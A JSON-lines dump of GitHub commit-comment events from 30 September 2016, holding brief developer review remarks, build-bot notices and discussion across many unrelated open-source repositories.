{"id":"4645780619","type":"CommitCommentEvent","actor":{"login":"ssssam"},"repo":{"name":"CodethinkLabs/sandboxlib"},"payload":{"comment":{"id":19247736,"position":null,"line":null,"path":null,"commit_id":"128bfa7c891da9d5fb2740cc20e24ac5bbea85c3","created_at":"2016-09-30T20:50:49Z","updated_at":"2016-09-30T20:50:49Z","body":"I think this will reintroduce problem with Python 2.7 now. See issues #17 and #19.\r\n\r\nThe issue was that if a Python exception was raised after the call to os.chroot(), it would try to lazy-load the string-escape module and fail because the process was in a chroot and couldn't access stuff in /usr/ any more. This meant YBD didn't report some build failures properly. Unless loading 'unicode-escape' implicitly brings ijn 'string-escape' in Python 2.7, that problem will now occur again.\r\n\r\nMaybe a better solution is to, if sys.version[0] == 2, use string-escape, else use unicode-escape ? I recommend testing this more though, ideally adding a testcase to show that exceptions inside the chrooted process can be propagated successfully. IIRC the exception that occurs in real life is subprocess.CalledProcessError, so I think you just need to write test that tries to run a non-existant program and then checks that a subprocess.CalledProcessError is raised, and not that annoying LookupError"}},"created_at":"2016-09-30T20:50:49Z"}
{"id":"4645783485","type":"CommitCommentEvent","actor":{"login":"jafdy"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19247762,"position":null,"line":null,"path":null,"commit_id":"4b2e025e6dc4043ea70e915b504a9bdd94659bd3","created_at":"2016-09-30T20:51:26Z","updated_at":"2016-09-30T20:51:26Z","body":"By # 0.1 hull damage per frame!!"}},"created_at":"2016-09-30T20:51:26Z"}
{"id":"4645784607","type":"CommitCommentEvent","actor":{"login":"PhilipDixon"},"repo":{"name":"PhilipDixon/cakeorpie.co"},"payload":{"comment":{"id":19247779,"position":null,"line":null,"path":null,"commit_id":"1e030dd798ddaad47022f9cd628c77bcd5b39a21","created_at":"2016-09-30T20:51:39Z","updated_at":"2016-09-30T20:51:39Z","body":"readme"}},"created_at":"2016-09-30T20:51:39Z"}
{"id":"4645786499","type":"CommitCommentEvent","actor":{"login":"perrysk-msft"},"repo":{"name":"Microsoft/sql-server-samples"},"payload":{"comment":{"id":19247828,"position":null,"line":null,"path":null,"commit_id":"d9254d0d6c153e30eed610c32dfc8191d746588d","created_at":"2016-09-30T20:52:03Z","updated_at":"2016-09-30T20:52:03Z","body":"Hey Michael –\r\n\r\nThis somehow got lost in my mailbox – Apologies for that.\r\n\r\nWe just released the SQL Server 2106 Express Docker image on Docker Hub<https://hub.docker.com/r/microsoft/mssql-server-2016-express-windows/> and also published the Docker file here<https://github.com/Microsoft/sql-server-samples/blob/master/samples/manage/windows-containers/mssql-server-2016-express-windows/dockerfile>. If not a big trouble, could you please resubmit your PL against the latest version of the repo to avoid conflicts?\r\n\r\nThanks, Perry\r\nFrom: Michael Friis [mailto:notifications@github.com]\r\nSent: Friday, September 30, 2016 12:22 PM\r\nTo: Microsoft/sql-server-samples <sql-server-samples@noreply.github.com>\r\nCc: Perry Skountrianos <Perry.Skountrianos@microsoft.com>; Mention <mention@noreply.github.com>\r\nSubject: Re: [Microsoft/sql-server-samples] SQL Server 2016 in Win Containers (d9254d0)\r\n\r\n\r\n@perrysk-msft<https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fperrysk-msft&data=01%7C01%7CPerry.Skountrianos%40microsoft.com%7C2599f6fed7984087305808d3e9670091%7C72f988bf86f141af91ab2d7cd011db47%7C1&sdata=k4NVvKWkB9ZZZSvo8L8gHfPgsMFPo37OpzD4Q1vaqEo%3D&reserved=0> I take this to mean that you are not in favor of my PR...? #133<https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2FMicrosoft%2Fsql-server-samples%2Fpull%2F133&data=01%7C01%7CPerry.Skountrianos%40microsoft.com%7C2599f6fed7984087305808d3e9670091%7C72f988bf86f141af91ab2d7cd011db47%7C1&sdata=lYNw139%2FayqXGWpCVv7i05CUvMMIEbyetfn1YnvOo4Q%3D&reserved=0>\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2FMicrosoft%2Fsql-server-samples%2Fcommit%2Fd9254d0d6c153e30eed610c32dfc8191d746588d%23commitcomment-19246580&data=01%7C01%7CPerry.Skountrianos%40microsoft.com%7C2599f6fed7984087305808d3e9670091%7C72f988bf86f141af91ab2d7cd011db47%7C1&sdata=emqcE4g2o5bxz3jgNz57%2BfSq9cc94AW7tcvB%2Fa%2F7SW8%3D&reserved=0>, or mute the thread<https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fnotifications%2Funsubscribe-auth%2FAHHezLuImRVKADyDIRjcCqkGsgeDu5Lpks5qvWE_gaJpZM4KLbNe&data=01%7C01%7CPerry.Skountrianos%40microsoft.com%7C2599f6fed7984087305808d3e9670091%7C72f988bf86f141af91ab2d7cd011db47%7C1&sdata=xHBX%2BzUnl5O1ATZAPpdOvPGmQuNzloKZV7IdUrO3Tbk%3D&reserved=0>.\r\n"}},"created_at":"2016-09-30T20:52:03Z"}
{"id":"4645786588","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19247839,"position":null,"line":null,"path":null,"commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T20:52:04Z","updated_at":"2016-09-30T20:52:04Z","body":"Tablemaker.php was my \"cheat\" for creating the database table for the form I was working on."}},"created_at":"2016-09-30T20:52:04Z"}
{"id":"4645793043","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19248040,"position":40,"line":405,"path":"okhttp/src/main/java/io/grpc/okhttp/OkHttpClientTransport.java","commit_id":"93e090492fa12dfa8d2a67511862fb4ccccbe4d7","created_at":"2016-09-30T20:53:24Z","updated_at":"2016-09-30T20:53:24Z","body":"handle the case remaining is <= 0"}},"created_at":"2016-09-30T20:53:24Z"}
{"id":"4645797492","type":"CommitCommentEvent","actor":{"login":"deadlybutter"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19248103,"position":36,"line":36,"path":"lib/admin.js","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T20:54:12Z","updated_at":"2016-09-30T20:54:12Z","body":"yeah I fixed this in my current branch, whoops!"}},"created_at":"2016-09-30T20:54:12Z"}
{"id":"4645797672","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19248105,"position":40,"line":405,"path":"okhttp/src/main/java/io/grpc/okhttp/OkHttpClientTransport.java","commit_id":"93e090492fa12dfa8d2a67511862fb4ccccbe4d7","created_at":"2016-09-30T20:54:14Z","updated_at":"2016-09-30T20:54:14Z","body":"and the case out of bound"}},"created_at":"2016-09-30T20:54:14Z"}
{"id":"4645798353","type":"CommitCommentEvent","actor":{"login":"olucurious"},"repo":{"name":"olucurious/PyFCM"},"payload":{"comment":{"id":19248120,"position":null,"line":null,"path":null,"commit_id":"39373be8a198120e26e128054ec4ec58846e0988","created_at":"2016-09-30T20:54:23Z","updated_at":"2016-09-30T20:54:23Z","body":"I'm sorry for my carelessness, it has been fixed here: https://github.com/olucurious/PyFCM/pull/59/commits/72cc2c81883be4c066aaec5e73cdd9761e713b18"}},"created_at":"2016-09-30T20:54:23Z"}
{"id":"4645803249","type":"CommitCommentEvent","actor":{"login":"ChessQuake"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19248148,"position":null,"line":null,"path":null,"commit_id":"4b4e75589de57544b2aeb32090de681ac8eef189","created_at":"2016-09-30T20:55:25Z","updated_at":"2016-09-30T20:55:25Z","body":"Hear hear!  Good luck!"}},"created_at":"2016-09-30T20:55:25Z"}
{"id":"4645804523","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19248154,"position":15,"line":495,"path":"command-parser.js","commit_id":"e8d7bd1c231b423bdba7e368f2a2a814ce196459","created_at":"2016-09-30T20:55:42Z","updated_at":"2016-09-30T20:55:42Z","body":"Sure."}},"created_at":"2016-09-30T20:55:42Z"}
{"id":"4645805066","type":"CommitCommentEvent","actor":{"login":"ydubreuil"},"repo":{"name":"jenkinsci/blueocean-plugin"},"payload":{"comment":{"id":19248156,"position":7,"line":31,"path":"Jenkinsfile","commit_id":"9ee1fe3d9c5ed09af174d694a4a85e40fa11a370","created_at":"2016-09-30T20:55:49Z","updated_at":"2016-09-30T20:55:49Z","body":"@tfennelly calling `assemble-dependencies` is actually already done during the build here https://github.com/jenkinsci/blueocean-plugin/blob/master/blueocean/pom.xml#L132 . I've added that so they are always available to build a Docker image"}},"created_at":"2016-09-30T20:55:49Z"}
{"id":"4645810033","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/eris-abi"},"payload":{"comment":{"id":19248178,"position":166,"line":170,"path":"core/core.go","commit_id":"540864a31b5cd5e504a1ea13367fc67c59c68387","created_at":"2016-09-30T20:56:49Z","updated_at":"2016-09-30T20:56:49Z","body":"Converts this looking string `[1, 2, 3]` into a `[]interface{}` value, which you then walk through with `range` and feed to the `packInterfaceValue` as a string (with `fmt.Sprintf()`, for example). Provided, of course, if all variants of `[ ... ]` a valid JSON. "}},"created_at":"2016-09-30T20:56:49Z"}
{"id":"4645811985","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248190,"position":36,"line":36,"path":"dbTest/dbDisp.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T20:57:15Z","updated_at":"2016-09-30T20:57:15Z","body":"It was my initial idea. Then I left it behind for the work I was doing on the specific form and decided to revisit it later if I saw patterns forming in the forms... I imagine whether or not I decide to incorporate expression engine back into their website vs. abandoning it will also play a major major role in this.\r\n\r\nNote: I did not go back through these files before putting them up as there was a lot to do at work following my vacation -- I figured it was better to get what I'd done in your hands sooner (since you were also doing work on forms) and work on cleaning it up/making it reader friendly later. (I have a lot of faith in your deciphering ability :P Sorry!)\r\n"}},"created_at":"2016-09-30T20:57:15Z"}
{"id":"4645814307","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248209,"position":2,"line":2,"path":"dbTest/dbExp.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T20:57:45Z","updated_at":"2016-09-30T20:57:45Z","body":"Certainly! (Note: Did I delete them? or is that a future thing?)\r\n"}},"created_at":"2016-09-30T20:57:45Z"}
{"id":"4645822037","type":"CommitCommentEvent","actor":{"login":"stuartwdouglas"},"repo":{"name":"fakereplace/fakereplace"},"payload":{"comment":{"id":19248224,"position":4,"line":97,"path":"core/src/main/java/org/fakereplace/transformation/UnmodifiedFileIndex.java","commit_id":"99500a362cd92ff86053562cab9e335947083124","created_at":"2016-09-30T20:59:23Z","updated_at":"2016-09-30T20:59:23Z","body":"Probably if you put the index in the root directory"}},"created_at":"2016-09-30T20:59:23Z"}
{"id":"4645822067","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19248225,"position":null,"line":null,"path":null,"commit_id":"894f59ca27f2169470f30063a720772893d5367e","created_at":"2016-09-30T20:59:24Z","updated_at":"2016-09-30T20:59:24Z","body":"I checked without our ixit master patches and antialiasing still forced to low, I must just not remember correctly how well this game handled antialiasing."}},"created_at":"2016-09-30T20:59:24Z"}
{"id":"4645822802","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19248226,"position":null,"line":null,"path":null,"commit_id":"3ee8ac95e2bb28de1f0e065d91131652c24e5887","created_at":"2016-09-30T20:59:32Z","updated_at":"2016-09-30T20:59:32Z","body":"It is a compatibility issue indeed but it only affects exceptions thrown from constructors that then bubble through Java code intended to handle them. I dunno...seems like it would be fairly limited in scope. @enebo?"}},"created_at":"2016-09-30T20:59:32Z"}
{"id":"4645823120","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19248227,"position":null,"line":null,"path":null,"commit_id":"9c444775739566f37667e12dee482aa2e8d23a0d","created_at":"2016-09-30T20:59:38Z","updated_at":"2016-09-30T20:59:38Z","body":"One probably shouldn't, yes. Just wanted you to know that this implementation depends on that thing.\r\nMaybe there's a reason for implementing a more reliable `is_bot` function? That will check if player is in CCSBotManager, for example."}},"created_at":"2016-09-30T20:59:38Z"}
{"id":"4645823601","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19248228,"position":null,"line":null,"path":null,"commit_id":"4b2e025e6dc4043ea70e915b504a9bdd94659bd3","created_at":"2016-09-30T20:59:44Z","updated_at":"2016-09-30T20:59:44Z","body":"Still a nerf."}},"created_at":"2016-09-30T20:59:44Z"}
{"id":"4645825739","type":"CommitCommentEvent","actor":{"login":"iftekhar01bd"},"repo":{"name":"iftekhar01bd/Python_Mania"},"payload":{"comment":{"id":19248230,"position":null,"line":null,"path":null,"commit_id":"cfc7e72f4e89fdf5a7ea233f68ab0e7c7da8919d","created_at":"2016-09-30T21:00:11Z","updated_at":"2016-09-30T21:00:11Z","body":"added the GNU license"}},"created_at":"2016-09-30T21:00:11Z"}
{"id":"4645826412","type":"CommitCommentEvent","actor":{"login":"wpjunior"},"repo":{"name":"backstage/functions"},"payload":{"comment":{"id":19248233,"position":11,"line":11,"path":"lib/http/routers/HealthcheckRouter.js","commit_id":"5c8380ad051fea12ee74f7735019be19f4b90a7d","created_at":"2016-09-30T21:00:18Z","updated_at":"2016-09-30T21:00:18Z","body":"We need to care about this, we need only a storage instance (singleton) inside the app, in this case we are creating two instances of redis connection."}},"created_at":"2016-09-30T21:00:18Z"}
{"id":"4645829868","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19248237,"position":null,"line":null,"path":null,"commit_id":"ba74846a702072ada01519684fa4ba63bccca970","created_at":"2016-09-30T21:01:01Z","updated_at":"2016-09-30T21:01:01Z","body":"I'm not 100% sure...but I guess I'm confused how they wouldn't be given that there's no concept of current working directory inside classloader resources."}},"created_at":"2016-09-30T21:01:01Z"}
{"id":"4645838490","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19248254,"position":null,"line":null,"path":null,"commit_id":"ed91cb4b4c39ec05cf96006d95460e9268a47a2b","created_at":"2016-09-30T21:02:51Z","updated_at":"2016-09-30T21:02:51Z","body":"We'll do a master in a week anyway when GraalVM is out.\r\n\r\nCherry picking wasn't easy for some reason."}},"created_at":"2016-09-30T21:02:51Z"}
{"id":"4645840526","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19248259,"position":null,"line":null,"path":null,"commit_id":"eb796b2710c394fead43c3f1b73be21428f9fa22","created_at":"2016-09-30T21:03:18Z","updated_at":"2016-09-30T21:03:18Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36441/testReport/) for this commit**"}},"created_at":"2016-09-30T21:03:18Z"}
{"id":"4645842348","type":"CommitCommentEvent","actor":{"login":"Kevin-Wei"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":19248262,"position":null,"line":null,"path":null,"commit_id":"cb182c5830a4338366023fecaf3102dac56dc1d0","created_at":"2016-09-30T21:03:42Z","updated_at":"2016-09-30T21:03:42Z","body":"@sarathpyerra spacing please"}},"created_at":"2016-09-30T21:03:42Z"}
{"id":"4645843482","type":"CommitCommentEvent","actor":{"login":"tonistiigi"},"repo":{"name":"docker/swarmkit"},"payload":{"comment":{"id":19248264,"position":19,"line":326,"path":"ca/config.go","commit_id":"a2abe794f7a1cfe0ed376fbc7c107ab3d6cf7705","created_at":"2016-09-30T21:03:57Z","updated_at":"2016-09-30T21:03:57Z","body":"these are from https://github.com/docker/swarmkit/commit/64f0bb334f73e046fadeca49c248ab0a8ac41348#diff-ef60e31c12c679e7ead79bb97154c732R349 https://github.com/docker/swarmkit/commit/ac91fcc510550ad1ee8853c3c28bb0228f7a268d#diff-ef60e31c12c679e7ead79bb97154c732R350 but not sure is any meaningful difference"}},"created_at":"2016-09-30T21:03:57Z"}
{"id":"4645845493","type":"CommitCommentEvent","actor":{"login":"mike-schenk"},"repo":{"name":"Aviacode/nTsMapper"},"payload":{"comment":{"id":19248269,"position":null,"line":null,"path":null,"commit_id":"7739215b8271f873ff9a33c2e9e331bc31759f13","created_at":"2016-09-30T21:04:22Z","updated_at":"2016-09-30T21:04:22Z","body":"Beginning fix for #1"}},"created_at":"2016-09-30T21:04:22Z"}
{"id":"4645847764","type":"CommitCommentEvent","actor":{"login":"jaked122"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":19248277,"position":38,"line":672,"path":"src/crafting_gui.cpp","commit_id":"dcb1d34751b9ee9ecd1133aeb528f62735ebed65","created_at":"2016-09-30T21:04:53Z","updated_at":"2016-09-30T21:04:53Z","body":"Are you going to replace the functionality that you removed here?"}},"created_at":"2016-09-30T21:04:53Z"}
{"id":"4645849138","type":"CommitCommentEvent","actor":{"login":"mike-schenk"},"repo":{"name":"Aviacode/nTsMapper"},"payload":{"comment":{"id":19248285,"position":null,"line":null,"path":null,"commit_id":"157c097b1dffff2920656811c48586e18c07dba9","created_at":"2016-09-30T21:05:12Z","updated_at":"2016-09-30T21:05:12Z","body":"Finishes resolving #1 "}},"created_at":"2016-09-30T21:05:12Z"}
{"id":"4645860447","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19248306,"position":null,"line":null,"path":null,"commit_id":"cc737e7ae09f2b19c78a81a18fc37a64f12e003f","created_at":"2016-09-30T21:07:40Z","updated_at":"2016-09-30T21:07:40Z","body":"TeamCity Units.NET :: Build and Test [Build 166](http://teamcity.chump.work/viewLog.html?buildId=722&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-30T21:07:40Z"}
{"id":"4645862790","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19248311,"position":null,"line":null,"path":null,"commit_id":"cc737e7ae09f2b19c78a81a18fc37a64f12e003f","created_at":"2016-09-30T21:08:10Z","updated_at":"2016-09-30T21:08:10Z","body":"TeamCity Units.NET :: Build and Test [Build 166](http://teamcity.chump.work/viewLog.html?buildId=722&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:30"}},"created_at":"2016-09-30T21:08:10Z"}
{"id":"4645864626","type":"CommitCommentEvent","actor":{"login":"lukaszo"},"repo":{"name":"hackerspace-silesia/hs_scripts"},"payload":{"comment":{"id":19248316,"position":93,"line":93,"path":"mail_meetings/hs_wiki.py","commit_id":"bb10bcf6004ca52de67b0940ef06a86431ea4e52","created_at":"2016-09-30T21:08:32Z","updated_at":"2016-09-30T21:08:32Z","body":"Przez zmienne środowiskowe przekazywane są tylko login, hasło i e-mail. Zamieszczenie ich w kodzie byłoby bardzo nieodpowiedzialne :)\r\nAdres serwera poczty ovh jest ogólnie dostępny, więc niema żadnego ryzyka."}},"created_at":"2016-09-30T21:08:32Z"}
{"id":"4645868719","type":"CommitCommentEvent","actor":{"login":"plee777"},"repo":{"name":"plee777/phase-0-tracks"},"payload":{"comment":{"id":19248321,"position":null,"line":null,"path":null,"commit_id":"4af234e724e74aec653ebd30eaaf20695f358af6","created_at":"2016-09-30T21:09:29Z","updated_at":"2016-09-30T21:09:29Z","body":"@bontgoy"}},"created_at":"2016-09-30T21:09:29Z"}
{"id":"4645870047","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/dns.lua"},"payload":{"comment":{"id":19248323,"position":null,"line":null,"path":null,"commit_id":"25536834b666467c74ffd7adeb0fa3e926cc577b","created_at":"2016-09-30T21:09:47Z","updated_at":"2016-09-30T21:09:47Z","body":"Just a quick comment going over this: we use snake case across the entire codebase, not camel case. "}},"created_at":"2016-09-30T21:09:47Z"}
{"id":"4645874216","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19248332,"position":null,"line":null,"path":null,"commit_id":"5269a789481bfcae631fc822017109c5d7c562d3","created_at":"2016-09-30T21:10:44Z","updated_at":"2016-09-30T21:10:44Z","body":"UPDATE gameobject_template SET data4=1 WHERE entry=181699; do this and animation will work, unsure if it was changed"}},"created_at":"2016-09-30T21:10:44Z"}
{"id":"4645875816","type":"CommitCommentEvent","actor":{"login":"enebo"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19248336,"position":null,"line":null,"path":null,"commit_id":"3ee8ac95e2bb28de1f0e065d91131652c24e5887","created_at":"2016-09-30T21:11:03Z","updated_at":"2016-09-30T21:11:03Z","body":"@kares @headius So all JI methods we call throw real exceptions and has for all of 9k but for constructors do it the old way right?  So the risk in this case would be:\r\n\r\n- constructor call with only raiseexception type catch around it\r\n   - but not calling a method which can also raise similar exception\r\n   - or no JI method call in same place as construction\r\n\r\nSo I think it is pretty limited.  Bullets:\r\n\r\n- we could argue this is a bug of new behavior (native exceptions from JI only now)\r\n- we could wait until 9.2 since it will be holidayish timeframe and that is not that far away\r\n- we changed getFoo(int) and got caught (which is always embarassing)\r\n\r\nNot sure.  We say it is a bug and push forward or we wait ~3 months?"}},"created_at":"2016-09-30T21:11:03Z"}
{"id":"4645876900","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"shachaf/ghc-core"},"payload":{"comment":{"id":19248340,"position":null,"line":null,"path":null,"commit_id":"630196adf0bebf073328325302453ef1c409fd9a","created_at":"2016-09-30T21:11:18Z","updated_at":"2016-09-30T21:11:18Z","body":"#3 suggests this commit fixes problems with options—indeed there's no way `rawSystem` works when `PAGER` contains options, while `createProcess (shell pager)` should be fine in general. `less -r` will have its usual problems over `-R`. Quoting from the man page:\r\n\r\n>  Warning: when the -r option is used, less cannot keep track of the actual appearance of the screen (since this  depends  on  how  the  screen\r\n              responds to each type of control character).  Thus, various display problems may result, such as long lines being split in the wrong place."}},"created_at":"2016-09-30T21:11:18Z"}
{"id":"4645885100","type":"CommitCommentEvent","actor":{"login":"chriskjaer"},"repo":{"name":"jacted/gaest-slackbot"},"payload":{"comment":{"id":19248354,"position":null,"line":null,"path":null,"commit_id":"bd9ac0070926db6ac9c0217f104fedca121573a6","created_at":"2016-09-30T21:13:07Z","updated_at":"2016-09-30T21:13:07Z","body":"Awesome 👍 ;) "}},"created_at":"2016-09-30T21:13:07Z"}
{"id":"4645892305","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248365,"position":1,"line":1,"path":"dbTest/formats/rep_DogSit.html","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T21:14:45Z","updated_at":"2016-09-30T21:14:45Z","body":"So, what it holds is an example (real life) of the response for the form that I was working on. My plan was to modify it so that there are variables in place of the info that get filled in by a php document that reads it in. (It's a fairly simple method that I've already used with great success for creating transaction receipts in my square stuff)\r\n"}},"created_at":"2016-09-30T21:14:45Z"}
{"id":"4645899542","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248379,"position":63,"line":63,"path":"dbTest/formats/rep_DogSit.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T21:16:24Z","updated_at":"2016-09-30T21:16:24Z","body":"Hmmm... I remember messing with this -- I probably accidentally left it reversed! Good catch :)"}},"created_at":"2016-09-30T21:16:24Z"}
{"id":"4645905159","type":"CommitCommentEvent","actor":{"login":"richardrodgers"},"repo":{"name":"MITLibraries/tryiiif"},"payload":{"comment":{"id":19248392,"position":null,"line":null,"path":null,"commit_id":"efc58fda7c32c4d4da6434088f0af5e0e34d8a5d","created_at":"2016-09-30T21:17:39Z","updated_at":"2016-09-30T21:17:39Z","body":"Thanks a lot Frances (&Jeremy)!  Armand did want if ready to show for Hydra Connect next week so this is much appreciated. (Jeremy: this should deploy straight to Heroku, no?)"}},"created_at":"2016-09-30T21:17:39Z"}
{"id":"4645906000","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248394,"position":1,"line":1,"path":"dbTest/forms/rep_DogSit.html","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T21:17:50Z","updated_at":"2016-09-30T21:17:50Z","body":"Format would be the html code that displays a single response in a readable fashion.\r\nForms would be the code that is actually the form...\r\n"}},"created_at":"2016-09-30T21:17:50Z"}
{"id":"4645908305","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19248398,"position":null,"line":null,"path":null,"commit_id":"bc0eef1dc8537d63d1fd9e30fc76853969923c2e","created_at":"2016-09-30T21:18:20Z","updated_at":"2016-09-30T21:18:20Z","body":"TeamCity Units.NET :: Build and Test [Build 167](http://teamcity.chump.work/viewLog.html?buildId=723&buildTypeId=UnitsNet_BuildTest) is now running\n"}},"created_at":"2016-09-30T21:18:20Z"}
{"id":"4645909904","type":"CommitCommentEvent","actor":{"login":"GianniCarlo"},"repo":{"name":"Criptext/Monkey-Chat-iOS"},"payload":{"comment":{"id":19248403,"position":null,"line":null,"path":null,"commit_id":"bd18fc074f86dc9046a975153cef75a9644e6bac","created_at":"2016-09-30T21:18:42Z","updated_at":"2016-09-30T21:18:42Z","body":"Indentation changes from 4 spaces to 2 spaces should have been done in a different commit and to the whole project not only 2 files @erikaperugachi @aj1310 "}},"created_at":"2016-09-30T21:18:42Z"}
{"id":"4645910269","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19248404,"position":null,"line":null,"path":null,"commit_id":"bc0eef1dc8537d63d1fd9e30fc76853969923c2e","created_at":"2016-09-30T21:18:47Z","updated_at":"2016-09-30T21:18:47Z","body":"TeamCity Units.NET :: Build and Test [Build 167](http://teamcity.chump.work/viewLog.html?buildId=723&buildTypeId=UnitsNet_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 820 Build time: 0:0:28"}},"created_at":"2016-09-30T21:18:47Z"}
{"id":"4645911227","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19248406,"position":null,"line":null,"path":null,"commit_id":"bc0eef1dc8537d63d1fd9e30fc76853969923c2e","created_at":"2016-09-30T21:19:00Z","updated_at":"2016-09-30T21:19:00Z","body":"TeamCity Units.NET :: Publish NuGets [Build 167](http://teamcity.chump.work/viewLog.html?buildId=725&buildTypeId=UnitsNet_Publish) is now running\n"}},"created_at":"2016-09-30T21:19:00Z"}
{"id":"4645911269","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19248407,"position":null,"line":null,"path":null,"commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T21:19:01Z","updated_at":"2016-09-30T21:19:01Z","body":"Ho applicato le modifiche nel commit 6d7449521ce0da2e742439ad1a767acbc28d1aa3\r\nho messo gli strumenti per raggiungere gli obiettivi prefissati.\r\nSe avete altre correzioni commentate pure qui o usate il @ per la menzione.\r\n"}},"created_at":"2016-09-30T21:19:01Z"}
{"id":"4645912169","type":"CommitCommentEvent","actor":{"login":"anjdreas"},"repo":{"name":"anjdreas/UnitsNet"},"payload":{"comment":{"id":19248410,"position":null,"line":null,"path":null,"commit_id":"bc0eef1dc8537d63d1fd9e30fc76853969923c2e","created_at":"2016-09-30T21:19:13Z","updated_at":"2016-09-30T21:19:13Z","body":"TeamCity Units.NET :: Publish NuGets [Build 167](http://teamcity.chump.work/viewLog.html?buildId=725&buildTypeId=UnitsNet_Publish) outcome was **SUCCESS**\nSummary: Running Build time: 0:0:13"}},"created_at":"2016-09-30T21:19:13Z"}
{"id":"4645912884","type":"CommitCommentEvent","actor":{"login":"zluca"},"repo":{"name":"everypony/tabun"},"payload":{"comment":{"id":19248412,"position":null,"line":null,"path":null,"commit_id":"08a31a962191de1a98f557fa8740c14e8349d959","created_at":"2016-09-30T21:19:24Z","updated_at":"2016-09-30T21:19:24Z","body":"Все комментарии потерялись, низачёт!"}},"created_at":"2016-09-30T21:19:24Z"}
